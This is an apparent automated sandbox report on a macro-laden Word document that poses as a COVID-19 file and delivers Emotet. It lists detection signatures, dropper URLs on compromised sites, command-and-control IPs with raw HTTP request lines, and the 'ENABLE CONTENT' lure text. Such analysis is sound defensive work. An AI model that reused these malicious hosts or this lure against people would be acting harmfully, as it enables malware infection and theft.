Analysis Report AG60273928I_COVID-19_SARS-CoV-2.doc

Overview

General Information

Sample Name: AG60273928I_COVID-19_SARS-CoV-2.doc
Analysis ID: 338719
MD5: 6d718814f5cf1ccd99905fdac40a504a
SHA1: f1746098ad2bb75e3054351b190cc818712ae46a
SHA256: 6bb1fa2cba1d52674b980804939a39bb7dc3a68a364402d393e6a3ae520cdce9
Tags: docHeodo

Most interesting Screenshot:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: https://trayonlinegh.com/cgi-bin/HBPR/ Avira URL Cloud: Label: malware
Source: https://capturetheaction.com.au/wp-includes/Yjp/ Avira URL Cloud: Label: malware
Source: https://shulovbaazar.com/c/bcL6/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: AG60273928I_COVID-19_SARS-CoV-2.doc Virustotal: Detection: 26% Perma Link
Source: AG60273928I_COVID-19_SARS-CoV-2.doc ReversingLabs: Detection: 22%
Machine Learning detection for dropped file
Source: C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdbg source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbc source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbE source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2120130538.000000001B900000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: shulovbaazar.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 51.79.161.36:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 51.79.161.36:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404340 ET CNC Feodo Tracker Reported CnC Server TCP group 21 192.168.2.22:49170 -> 71.72.196.159:80
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp String found in memory: https://shulovbaazar.com/c/bcL6/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp String found in memory: https://mybusinessevent.com/tiki-install/e/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp String found in memory: http://uhk.cncranes.com/ErrorPages/3/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp String found in memory: https://capturetheaction.com.au/wp-includes/Yjp/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp String found in memory: https://thenetworker.ca/comment/8N4/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp String found in memory: https://trayonlinegh.com/cgi-bin/HBPR/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp String found in memory: http://mmo.martinpollock.co.uk/a/SQSGg/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ErrorPages/3/ HTTP/1.1Host: uhk.cncranes.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 71.72.196.159 71.72.196.159
Source: Joe Sandbox View IP Address: 71.72.196.159 71.72.196.159
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TWC-10796-MIDWESTUS TWC-10796-MIDWESTUS
Source: Joe Sandbox View ASN Name: REGISTER_UK-ASGB REGISTER_UK-ASGB
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /kdd8h70lwp/lfu3p05/u2kanr3/ HTTP/1.1DNT: 0Referer: 69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/Content-Type: multipart/form-data; boundary=--------------IOWFryyt5oe5vIUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 69.49.88.46Content-Length: 5572Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 71.72.196.159
Source: unknown TCP traffic detected without corresponding DNS query: 71.72.196.159
Source: unknown TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: unknown TCP traffic detected without corresponding DNS query: 69.49.88.46
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{73127D7D-FA20-48C4-87C4-17800DB89026}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /ErrorPages/3/ HTTP/1.1Host: uhk.cncranes.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: shulovbaazar.com
Source: unknown HTTP traffic detected: POST /kdd8h70lwp/lfu3p05/u2kanr3/ HTTP/1.1DNT: 0Referer: 69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/Content-Type: multipart/form-data; boundary=--------------IOWFryyt5oe5vIUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 69.49.88.46Content-Length: 5572Connection: Keep-AliveCache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp String found in binary or memory: http://mmo.martinpollock.co.uk/a/SQSGg/
Source: powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2107998363.00000000023F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114937163.00000000027A0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmp String found in binary or memory: http://uhk.cncranes.com
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp String found in binary or memory: http://uhk.cncranes.com/ErrorPages/3/
Source: rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2107998363.00000000023F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114937163.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2120077438.0000000002820000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2115162091.00000000039F1000.00000004.00000001.sdmp String found in binary or memory: http://www.litespeedtech.com
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2107269724.0000000000394000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2107269724.0000000000394000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp String found in binary or memory: https://capturetheaction.com.au/wp-includes/Yjp/
Source: powershell.exe, 00000005.00000002.2115174416.0000000003A04000.00000004.00000001.sdmp String found in binary or memory: https://mybusinessevent.com
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp String found in binary or memory: https://mybusinessevent.com/tiki-install/e/
Source: powershell.exe, 00000005.00000002.2115174416.0000000003A04000.00000004.00000001.sdmp String found in binary or memory: https://mybusinessevent.comp
Source: powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0D
Source: powershell.exe, 00000005.00000002.2115162091.00000000039F1000.00000004.00000001.sdmp String found in binary or memory: https://shulovbaazar.com
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp String found in binary or memory: https://shulovbaazar.com/c/bcL6/
Source: powershell.exe, 00000005.00000002.2115174416.0000000003A04000.00000004.00000001.sdmp String found in binary or memory: https://shulovbaazar.comp
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp String found in binary or memory: https://thenetworker.ca/comment/8N4/
Source: powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmp String found in binary or memory: https://trayonlinegh.com/cgi-bin/HBPR/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 12 N@m 13 ;a 10096 G
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a S
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a S
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 5517
Source: unknown Process created: Commandline size = 5421
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5421 Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Qafsungwqhhv\ Jump to behavior
Deletes files inside the Windows folder
Source: C:\Windows\SysWOW64\rundll32.exe File deleted: C:\Windows\SysWOW64\Aanys\cokk.vuq Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019036 7_2_10019036
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001307D 7_2_1001307D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10016A8F 7_2_10016A8F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100018B2 7_2_100018B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100082BB 7_2_100082BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10008B58 7_2_10008B58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000B161 7_2_1000B161
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001D96D 7_2_1001D96D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001B184 7_2_1001B184
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001BFAF 7_2_1001BFAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019FCB 7_2_10019FCB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100095D0 7_2_100095D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C201 7_2_1000C201
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001440A 7_2_1001440A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000740C 7_2_1000740C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10009211 7_2_10009211
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001D613 7_2_1001D613
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E813 7_2_1000E813
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000B82E 7_2_1000B82E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000CE33 7_2_1000CE33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001A23E 7_2_1001A23E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10015449 7_2_10015449
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001264A 7_2_1001264A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001364E 7_2_1001364E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002055 7_2_10002055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001665D 7_2_1001665D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10005C61 7_2_10005C61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10005477 7_2_10005477
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001467C 7_2_1001467C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001E84 7_2_10001E84
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019496 7_2_10019496
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000169C 7_2_1000169C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100108A9 7_2_100108A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100084B3 7_2_100084B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018CB5 7_2_10018CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100122BB 7_2_100122BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001A4BD 7_2_1001A4BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10014EC0 7_2_10014EC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007EC4 7_2_10007EC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000D0C9 7_2_1000D0C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E6D4 7_2_1000E6D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100052D9 7_2_100052D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C4D9 7_2_1000C4D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002CE2 7_2_10002CE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000D6E6 7_2_1000D6E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100068E6 7_2_100068E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10012EE8 7_2_10012EE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001BAED 7_2_1001BAED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001DAEC 7_2_1001DAEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100038F1 7_2_100038F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10006EF4 7_2_10006EF4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10016318 7_2_10016318
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019724 7_2_10019724
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000B32E 7_2_1000B32E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004137 7_2_10004137
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000673B 7_2_1000673B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001AB3D 7_2_1001AB3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10005F4C 7_2_10005F4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10010550 7_2_10010550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10003D60 7_2_10003D60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10015B6D 7_2_10015B6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10005778 7_2_10005778
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000D385 7_2_1000D385
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018989 7_2_10018989
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10014988 7_2_10014988
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000ED98 7_2_1000ED98
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000319D 7_2_1000319D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001CB9F 7_2_1001CB9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001B9C0 7_2_1001B9C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100099C3 7_2_100099C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10009FCC 7_2_10009FCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000FFD4 7_2_1000FFD4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F9D8 7_2_1000F9D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F5DC 7_2_1000F5DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100161E6 7_2_100161E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10010FEF 7_2_10010FEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E1F1 7_2_1000E1F1
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: AG60273928I_COVID-19_SARS-CoV-2.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Ut2r21ym17z8, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: AG60273928I_COVID-19_SARS-CoV-2.doc OLE indicator, VBA macros: true
Yara signature match
Source: 00000005.00000002.2107242892.0000000000216000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2107409443.0000000001BA6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@16/7@3/5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$60273928I_COVID-19_SARS-CoV-2.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD087.tmp Jump to behavior
Source: AG60273928I_COVID-19_SARS-CoV-2.doc OLE indicator, Word Document stream: true
Source: AG60273928I_COVID-19_SARS-CoV-2.doc OLE document summary: title field not present or empty
Source: AG60273928I_COVID-19_SARS-CoV-2.doc OLE document summary: edited time not present or 0
